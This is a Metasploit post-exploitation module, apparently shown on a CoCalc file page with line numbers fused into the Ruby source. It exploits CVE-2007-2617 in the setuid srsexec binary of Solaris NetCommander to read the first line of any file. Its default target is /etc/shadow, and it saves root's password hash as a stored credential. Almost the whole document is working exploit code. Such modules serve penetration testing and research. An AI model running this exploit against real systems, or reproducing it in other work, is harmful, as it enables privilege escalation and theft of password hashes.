CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/solaris/escalate/srsexec_readline.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Solaris::System8include Msf::Post::Solaris::Priv910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Solaris srsexec Arbitrary File Reader',15'Description' => %q{16This module exploits a vulnerability in NetCommander 3.2.3 and 3.2.5.17When srsexec is executed in debug (-d) verbose (-v) mode,18the first line of an arbitrary file can be read due to the suid bit set.19The most widely accepted exploitation vector is reading /etc/shadow,20which will reveal root's hash for cracking.21},22'License' => MSF_LICENSE,23'Author' => [24'h00die', # metasploit module25'iDefense' # discovery reported anonymously to https://labs.idefense.com26],27'Platform' => [ 'solaris' ],28'SessionTypes' => [ 'shell', 'meterpreter' ],29'References' => [30['CVE', '2007-2617'],31['URL', 'https://download.oracle.com/sunalerts/1000443.1.html'],32['URL', 'https://www.securityfocus.com/archive/1/468235'],33['EDB', '30021'],34['BID', '23915']35],36'DisclosureDate' => '2007-05-07'37)38)39register_options([40OptString.new('FILE', [true, 'File to read the first line of', '/etc/shadow'])41])42end4344def suid_bin_path45'/opt/SUNWsrspx/bin/srsexec'46end4748def check49if is_root?50fail_with Failure::BadConfig, 'Session already has root privileges'51end5253# This ls is based on the guidance in the sun alerts article54unin = cmd_exec '/usr/bin/ls /opt/SUNWsrspx/bin/UninstallNetConnect.*.sh'55unin =~ /UninstallNetConnect\.([\d.]{11})\.sh/56unless ::Regexp.last_match(1)57print_error 'NetConnect uninstall not found, either not installed or too new'58return false59end6061version = Rex::Version.new(::Regexp.last_match(1).split('.').map(&:to_i).join('.'))62unless version.between?(Rex::Version.new('3.2.3'), Rex::Version.new('3.2.4'))63print_error "#{version} is not vulnerable"64return false65end66print_good "#{version} is vulnerable"6768unless setuid? suid_bin_path69vprint_error "#{suid_bin_path} is not setuid, it must have been manually patched"70return false71end7273true74end7576def run77unless check78fail_with Failure::NotVulnerable, 'Target is not vulnerable'79end8081flag = Rex::Text.rand_text_alpha 582output = cmd_exec("#{suid_bin_path} -dvb #{datastore['FILE']} #{flag}")83vprint_good("Raw Command Output: #{output}")8485# The first line of the file is cut at 20 characters.86# If the output is longer than 20 characters, then87# the next line will start with the last 2 characters from the previous line,88# followed by the next 18 characters.8990formatted_output = output.scan(/binaries file line: (.+)$/).flatten.map do |line|91(line.length == 20) ? line[0..17] : line92end.join9394return if formatted_output.empty?9596print_good("First line of #{datastore['FILE']}: #{formatted_output}")9798return unless datastore['FILE'] == '/etc/shadow'99100print_good("Adding root's hash to the credential database.")101credential_data = {102origin_type: :session,103session_id: session_db_id,104workspace_id: myworkspace_id,105post_reference_name: fullname,106username: formatted_output.split(':')[0],107private_data: formatted_output.split(':')[1],108private_type: :nonreplayable_hash109}110create_credential(credential_data)111end112end113114115